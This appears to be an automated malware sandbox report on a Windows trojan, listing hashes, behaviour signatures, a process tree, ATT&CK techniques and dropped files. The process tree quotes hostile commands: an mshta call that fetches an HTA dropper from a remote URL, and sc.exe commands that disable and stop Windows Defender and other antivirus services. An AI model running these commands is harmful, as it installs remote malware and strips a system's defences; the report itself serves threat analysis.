Overview

overview

10

Static

static

3

0fe04be252...82.exe

windows7-x64

10

0fe04be252...82.exe

windows10-2004-x64

7

Analysis

  • max time kernel
    151s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    24/12/2023, 20:08

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    0fe04be252ef427ce0eda2d563dcbb82.exe

  • Size

    2.4MB

  • MD5

    0fe04be252ef427ce0eda2d563dcbb82

  • SHA1

    53c03dc7ddd7be33ceb1d6e85e28fb59ae2b73fb

  • SHA256

    608ed2cc7c1b992667b51f894df628e389520a1f447c790d8ef21e0cc75fa1e3

  • SHA512

    60c120d38af734db23ea0072366e830e0d643ef51003ad71ac4e4687f6979feb6a8cc1542bffe3b2079e99b26ca4575be85912ab8f4d2a18eed5358a83891e12

  • SSDEEP

    49152:MU3tlXIaVxQR1kDXWI68e2d9DXdUkRZYAAxug54kL3k98qs:Zj/TQ8GL8NddXukRKRugekYVs

Score
10/10
evasionpersistencetrojanupx

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://galaint.onlinesecstats.info/?0=103&1=7&2=1&3=68&4=i&5=7601&6=6&7=1&8=99600&9=1033&10=0&11=1111&12=psfdoyxtrk&14=1

Signatures

  • UAC bypass 3 TTPs 3 IoCs
    evasiontrojan
  • Disables taskbar notifications via registry modification
    evasion
  • Sets file execution options in registry 2 TTPs 64 IoCs
    persistence
  • Stops running service(s) 3 TTPs
    evasion
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • UPX packed file 12 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Drops file in System32 directory 3 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 37 IoCs
    adwarespyware
  • Modifies system certificate store 2 TTPs 2 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 48 IoCs
  • System policy modification 1 TTPs 4 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\0fe04be252ef427ce0eda2d563dcbb82.exe
    "C:\Users\Admin\AppData\Local\Temp\0fe04be252ef427ce0eda2d563dcbb82.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2880
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\0FE04B~1.EXE" >> NUL
      2⤵
        PID:2816
      • C:\Users\Admin\AppData\Roaming\Protector-jhkd.exe
        C:\Users\Admin\AppData\Roaming\Protector-jhkd.exe
        2⤵
        • UAC bypass
        • Sets file execution options in registry
        • Executes dropped EXE
        • Adds Run key to start application
        • Checks whether UAC is enabled
        • Drops file in System32 directory
        • Modifies Internet Explorer settings
        • Modifies system certificate store
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        • System policy modification
        PID:2752
        • C:\Windows\SysWOW64\sc.exe
          sc config ekrn start= disabled
          3⤵
          • Launches sc.exe
          PID:2440
        • C:\Windows\SysWOW64\sc.exe
          sc config AntiVirSchedulerService start= disabled
          3⤵
          • Launches sc.exe
          PID:1712
        • C:\Windows\SysWOW64\sc.exe
          sc config AntiVirService start= disabled
          3⤵
          • Launches sc.exe
          PID:1868
        • C:\Windows\SysWOW64\sc.exe
          sc stop AntiVirService
          3⤵
          • Launches sc.exe
          PID:2400
        • C:\Windows\SysWOW64\sc.exe
          sc config msmpsvc start= disabled
          3⤵
          • Launches sc.exe
          PID:3064
        • C:\Windows\SysWOW64\sc.exe
          sc stop msmpsvc
          3⤵
          • Launches sc.exe
          PID:3048
        • C:\Windows\SysWOW64\sc.exe
          sc config WinDefend start= disabled
          3⤵
          • Launches sc.exe
          PID:3052
        • C:\Windows\SysWOW64\sc.exe
          sc stop WinDefend
          3⤵
          • Launches sc.exe
          PID:2948
    • C:\Windows\SysWOW64\mshta.exe
      mshta.exe "http://galaint.onlinesecstats.info/?0=103&1=7&2=1&3=68&4=i&5=7601&6=6&7=1&8=99600&9=1033&10=0&11=1111&12=psfdoyxtrk&14=1"
      1⤵
      • Modifies Internet Explorer settings
      PID:2732
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" -startmediumtab -Embedding
      1⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1108
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1108 CREDAT:275457 /prefetch:2
        2⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:1516

    Network

          MITRE ATT&CK Enterprise v15

          Reconnaissance

          Resource Development

          Initial Access

          Execution

          Persistence

          Boot or Logon Autostart Execution

          2
          T1547

          Registry Run Keys / Startup Folder

          2
          T1547.001

          Create or Modify System Process

          1
          T1543

          Windows Service

          1
          T1543.003

          Privilege Escalation

          Abuse Elevation Control Mechanism

          1
          T1548

          Bypass User Account Control

          1
          T1548.002

          Boot or Logon Autostart Execution

          2
          T1547

          Registry Run Keys / Startup Folder

          2
          T1547.001

          Create or Modify System Process

          1
          T1543

          Windows Service

          1
          T1543.003

          Defense Evasion

          Abuse Elevation Control Mechanism

          1
          T1548

          Bypass User Account Control

          1
          T1548.002

          Impair Defenses

          2
          T1562

          Disable or Modify Tools

          1
          T1562.001

          Modify Registry

          6
          T1112

          Subvert Trust Controls

          1
          T1553

          Install Root Certificate

          1
          T1553.004

          Credential Access

          Discovery

          System Information Discovery

          2
          T1082

          Lateral Movement

          Collection

          Command and Control

          Exfiltration

          Impact

          Service Stop

          1
          T1489

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
            Filesize

            344B

            MD5

            703b7ed746b99f141b51cd3d8d707eff

            SHA1

            ac1507bc5598885347ea9e9ace8c015807ad2113

            SHA256

            402de5a30d5a2367c1e994a046c5f18016adfbbd3d86e033623edc556df2228e

            SHA512

            e3217a1effee078727b6d881b12ff60defa7414dc477a24774077629cdf45ad1f3bfa4749445bd7eee18ec66af7921172236e0c0381af8c831f6bdb49a5b3f0d

            Download Submit

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
            Filesize

            344B

            MD5

            4faff73fc3c53c4a3b48d6a00445ddf6

            SHA1

            46a7065944cd84ba36a8401637901db29f2638f2

            SHA256

            48051c57a8df3dc568e880d696531685dfb6dfa22570f9ac5a7ebe813be12301

            SHA512

            caed7b1a0c87422ca5ce9a57503be2b5fb842073c0612bf3e0b99c71e72c3f5f67572563805799dd4ad741171365209cb53429a6cc526941512449756bb2b140

            Download Submit

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
            Filesize

            344B

            MD5

            fe85d7477cd9ef6315d6118c8963f2a2

            SHA1

            c0deb8180da3494a85f83a28b656dbdb5a088299

            SHA256

            c3e7ff7218490250f8fec4e40ab7ff3fa1a6424eb13cf25e167c27c9752dbdc7

            SHA512

            9d44390d9090eb75f170d640c248eed716b29b0d96e28eb09f9f8462f4b475fcb2a7341cb8bd683d42f7edef3e834f8586f5a07c53444b0510293f57050f0543

            Download Submit

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
            Filesize

            344B

            MD5

            1e5116a65f63aef0695624a35084b747

            SHA1

            63b10e535594e86dceb2412f3467e0246c3809e3

            SHA256

            9909cd67e395e2515e1c9e556fade22abeef7d679f1d841924894e808d6d31d9

            SHA512

            6c4d07afe3db39f39cd924086215737bff76d1adc4457ec7557242ec7671374bfcc77cb52876002820e51ff039ccda8ea00ea9fba13b34373b0ff402470f4913

            Download Submit

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
            Filesize

            344B

            MD5

            6d7bd7376d46afb467cc0c476715cfa9

            SHA1

            22e327925d8eebb5bdef25b42c7e3a231bfeb40b

            SHA256

            62a95faa6fa8a92bf6e69c7fc5e796aec64d82e560054429a6ec32b64a5ce6ac

            SHA512

            c3533641f117122dc353ef48640c039a2a2c75eb7426889245be5d2ee967aadfcb1a1080ba2d3858acc70e703a2e073862f4f298ae1a9a1309593b16da87f29e

            Download Submit

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
            Filesize

            344B

            MD5

            8ba6b854f553b8ab6a31f497ddb92c3d

            SHA1

            84470342fcc8425e82bf777f7756eb715a8df00f

            SHA256

            ce39aeda4e5b0057d837ecf6b2c5cc2ff915dc0ed3324d3f350e7ccc5197cc62

            SHA512

            f9e4efb43ecbb002f1a395c7c4a6832e9fd4c4a621998df8c445bdcc5fef6731856dbff885317f154b39acc6c68e46787f34a630f9811a231ef7585e0c3cca1d

            Download Submit

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
            Filesize

            344B

            MD5

            e931a1ed2c2f654d68c35fbfe7b2360f

            SHA1

            0e3144d6760b667c5c27a681c096b47fb558d69b

            SHA256

            effa3295c35241d13fb8c60fd033d3b78cb8165c3b70a55148b8eaa8a3bc64fb

            SHA512

            7dcb9f2c3e1df5e0ca46db031a5821519a6c64d0e3ac79c5b32e86312d84d716ec8cf60a02eeaa184bf81070d41427678fde98dfc9b0907497c29ce892652f70

            Download Submit

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
            Filesize

            344B

            MD5

            b4e0875e024f821af53f1e6dd24a0316

            SHA1

            5cc8225f789c4b03b2304af3bf0ab46bbcda22ae

            SHA256

            514eeb0a86ce7e83380f3ddea36b9b1edac0bf60d4135ac2f4c64307a6d55f3d

            SHA512

            a23931736f823ffe39718ea4201cae324d09aa27d47a9e03974a1eccbde3b2dc072e476ee2a61c60c9be82cbad860c5e3e97af18704e9011cc8302f897832342

            Download Submit

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
            Filesize

            344B

            MD5

            a8d49fd1dc0601a596c4eb386f264634

            SHA1

            4bb1acfebfac0c1871408aec2bf84af7d8664b13

            SHA256

            8b0e0c4eb1e57cb72d32bd3ef84e729435ed51cb2da8dcdd2e6bae576101a5e5

            SHA512

            fa11329814609c4efed2e1cc58eb7f9728713b25d2d0669b4965923ed2a2a9dac7cc2be725a6c0ef4e2223336a856afe2061e8528faa85520d76cbaba37991af

            Download Submit

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
            Filesize

            344B

            MD5

            626cc73ee5e5031f06b0da506c35db0d

            SHA1

            d8384559bef63b9ece997b8392fc36efeb245166

            SHA256

            200ba4b5fcd398328f58a71ee1702139c89d33f13aab5fae9138599740f5b273

            SHA512

            aaa717e36d9f3ef5825eb2141da18e58dbded17f3518ef9ec56cab207333a308dbd07849cf89cb739793556243b655b1f896cca6e3eeac97c68cad340d5a0f42

            Download Submit

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
            Filesize

            344B

            MD5

            5bdc31482b36a0d660fe1cb90a8f7ef3

            SHA1

            08827c2587c7b664fc3cf672f11a6608ebca9ac0

            SHA256

            8e13362e36f7161eca342cf863baa9f24204e8317987a4c5d0092ee06de440f1

            SHA512

            2529617dacbf22b382929c864d865d928385a491da0d8944867bab7c3b5c981045b975b0faf7691ab0baf9a4e227916406fe6adbb4c19c86fe7222c203558c7c

            Download Submit

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
            Filesize

            344B

            MD5

            4e42686685e7d4726ebc91adbc6a84d8

            SHA1

            34b2f4d0847422a94a5ce13be5e7fce9efecb912

            SHA256

            dfe7dcdc871261b237767bd327701d7679aa3c59fb507660762796a2adaf72be

            SHA512

            46ff5d69c1d87dbfcb30d86612277d8eac2d67d8d3135b11eaf9b9a190817c31faab65b91377aa0156f7d3c203e46e3735219d89b111b6f7868f644099ab9d01

            Download Submit

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
            Filesize

            344B

            MD5

            effc3007d4a4313f2ab4b94425311082

            SHA1

            f5173e5913a696c7178d5248e101cac38960824b

            SHA256

            91cba6b03b7bcb8aedeb9008e3dd5a71d2d1566d9441cad875f2de5cade345b6

            SHA512

            89ca26369c33bb0cba9c02be6287b7546aa0f2898aa1ff81b0fc9ded9459a9071fc40c7e0a3c0af9e186c1a7609f0834b8a7bc84d30a55e08214a0433b66db2d

            Download Submit

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
            Filesize

            344B

            MD5

            aa8ad2c1c825bffa0fae7f5dc7cd6fc6

            SHA1

            4ad98395e74eca406ea833e5180ca9ae22b140dd

            SHA256

            52a63e265bea0d2ab3fbffc8043dc0bb0d907733b3e224af80e8449fe72ca53f

            SHA512

            a2fdaec4463931c8378b2ed50a0e423a71ab79aa299ec5efb777c7b198f78ec5286fbe9b8188ae7cd6ebf03a93c932843f040f934b0db29a3d77d2fb3c2a06b0

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\Cab9C40.tmp
            Filesize

            30KB

            MD5

            3bea129af676dd5615285d89d4468718

            SHA1

            b5ef57ea0fe5e38f5ebb829105c943e102b79b3a

            SHA256

            f9670c90b7d13aeab03b6516cffaeba69836ddfa798fbebb125751f67dc2106f

            SHA512

            c84db12b0314c449b401adffb0ac4b3ec4aa61878bf9a7abc0c2574b45faa234bf6d6a2bf1b49f9a88ce13fe0f341c5ff5652452bc5bdb23449b4d80c1de17c5

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\Tar9CB1.tmp
            Filesize

            18KB

            MD5

            b61ffb74258b8a212972e510da8aeaff

            SHA1

            51a686642a5ae039b580326532f1e85b449da3aa

            SHA256

            e8ef2bd87120b5f333723167268b2de29e67ed0c5b08c5935eb14c4015e5b590

            SHA512

            8e6399112e35a6f485ad09c6bc3d39cf5cd3e31e9c2857b8545a48d70ae9a3042dbfafc60ed54d46c67eefae14c7424748996eae7d1adcd5d30f209242b21cc3

            Download Submit

          • C:\Users\Admin\AppData\Roaming\Protector-jhkd.exe
            Filesize

            193KB

            MD5

            fed80a33f18f6c08b92dbb5e6f31740b

            SHA1

            fb5161a731ed8bc0169511d998c4a4508f377b59

            SHA256

            07a4c0f2637d18458ab854ac992f58bc982c6394c5ab3541a70f33d3fc2a66a4

            SHA512

            b4ad23883c433fbb3ee6596cad0ce1d01721f911e036d22ea4a266653aff4823417624ba0bd6f4ef4f884ad2a221a1bec2f42ca58fca85effbbc132a1a518c6a

            Download Submit

          • C:\Users\Admin\AppData\Roaming\Protector-jhkd.exe
            Filesize

            96KB

            MD5

            a3e9fe60d84727ed171209018cdca4ff

            SHA1

            5598097fa8bafc8146e8d2ca9a0fcd924e33346e

            SHA256

            4483bd56c729c8412d75a9c74fa1a67c7a303d586e40d18d4b83ceaf48674ed5

            SHA512

            375a99a03a2af107d5f80c83d9fc3c6e72c6a75dc6392ce4c51f176f1812725956316fc01863d2654f9a3d76b22231c0daeb023e8fd070398ab07d823e9b029a

            Download Submit

          • C:\Users\Admin\AppData\Roaming\Protector-jhkd.exe
            Filesize

            148KB

            MD5

            c1b417c342879a46b7e47a19d3c008e9

            SHA1

            2547a78ed70635fecdbb5bf08d6e0be181f13387

            SHA256

            1ec2da14a2bb998af42842082701ed10a946c0a25d1b0009f08d686a3573a317

            SHA512

            edf2430047153b6f4b4dbe98a0f5ea36a46948f5044ef3e9136e8b8e76b8fe7055eb065fc28a7c370f7d13c9b4c496a9dd39fb1a1935a3d72d2c64ac2ac10e19

            Download Submit

          • \Users\Admin\AppData\Roaming\Protector-jhkd.exe
            Filesize

            107KB

            MD5

            2f405a9798d1a5f8880759bdaf8aeffc

            SHA1

            240e9a9b997c8eabc371ef3b10758a3b0cd6b9b8

            SHA256

            bdfddfa79214ac23e9e168e776a342064721600c13b59f0fa7ec9e50e1fc96cc

            SHA512

            8d5a4d97d0b44b2abee1d0f29e5fd347e0888bbf33e2636c4705d943787b8995fc189928483e4162dc5ebe976b5b15711775ec1f0afc2a4d4cb3fa1b9a81b72c

            Download Submit

          • \Users\Admin\AppData\Roaming\Protector-jhkd.exe
            Filesize

            177KB

            MD5

            7ab03c6dd9b1625c11f29f4fa16fd847

            SHA1

            8835c033dd3b4f01e1ef3805324bd9f742b8e6f4

            SHA256

            6af0d47ceadbded5a30884605cbca875955151b54caa5f3a9cbc61b98a9e0a9d

            SHA512

            db41688035e4600a11741583c552192b8bc35c25d68dd727135bfd100170a69dd94a54809f3a009f474778d93aabc6f1ff70a8b1d6c75bf89e25af83e5037feb

            Download Submit

          • memory/2752-19-0x0000000074CC0000-0x0000000074D39000-memory.dmp

            Filesize

            484KB

            Download

          • memory/2752-283-0x0000000000220000-0x0000000000221000-memory.dmp

            Filesize

            4KB

            Download

          • memory/2752-31-0x0000000006270000-0x00000000072D2000-memory.dmp

            Filesize

            16.4MB

            Download

          • memory/2752-44-0x0000000000400000-0x00000000007C3000-memory.dmp

            Filesize

            3.8MB

            Download

          • memory/2752-51-0x0000000003380000-0x0000000003382000-memory.dmp

            Filesize

            8KB

            Download

          • memory/2752-56-0x0000000000400000-0x0000000000A35000-memory.dmp

            Filesize

            6.2MB

            Download

          • memory/2752-57-0x0000000075360000-0x0000000075470000-memory.dmp

            Filesize

            1.1MB

            Download

          • memory/2752-58-0x0000000000400000-0x00000000007C3000-memory.dmp

            Filesize

            3.8MB

            Download

          • memory/2752-29-0x0000000000400000-0x00000000007C3000-memory.dmp

            Filesize

            3.8MB

            Download

          • memory/2752-23-0x0000000000400000-0x00000000007C3000-memory.dmp

            Filesize

            3.8MB

            Download

          • memory/2752-25-0x0000000000400000-0x00000000007C3000-memory.dmp

            Filesize

            3.8MB

            Download

          • memory/2752-21-0x0000000000400000-0x00000000007C3000-memory.dmp

            Filesize

            3.8MB

            Download

          • memory/2752-22-0x0000000000220000-0x0000000000221000-memory.dmp

            Filesize

            4KB

            Download

          • memory/2752-30-0x0000000005620000-0x00000000060DA000-memory.dmp

            Filesize

            10.7MB

            Download

          • memory/2752-20-0x0000000000400000-0x00000000007C3000-memory.dmp

            Filesize

            3.8MB

            Download

          • memory/2752-924-0x0000000000400000-0x00000000007C3000-memory.dmp

            Filesize

            3.8MB

            Download

          • memory/2752-18-0x0000000000400000-0x0000000000A35000-memory.dmp

            Filesize

            6.2MB

            Download

          • memory/2880-15-0x0000000000400000-0x00000000007C3000-memory.dmp

            Filesize

            3.8MB

            Download

          • memory/2880-16-0x0000000074CC0000-0x0000000074D39000-memory.dmp

            Filesize

            484KB

            Download

          • memory/2880-17-0x0000000075360000-0x0000000075470000-memory.dmp

            Filesize

            1.1MB

            Download

          • memory/2880-2-0x0000000000400000-0x00000000007C3000-memory.dmp

            Filesize

            3.8MB

            Download

          • memory/2880-4-0x0000000000400000-0x00000000007C3000-memory.dmp

            Filesize

            3.8MB

            Download

          • memory/2880-5-0x00000000001B0000-0x00000000001B1000-memory.dmp

            Filesize

            4KB

            Download

          • memory/2880-3-0x0000000074CC0000-0x0000000074D39000-memory.dmp

            Filesize

            484KB

            Download

          • memory/2880-1-0x0000000075360000-0x0000000075470000-memory.dmp

            Filesize

            1.1MB

            Download

          • memory/2880-0-0x0000000000400000-0x0000000000A35000-memory.dmp

            Filesize

            6.2MB

            Download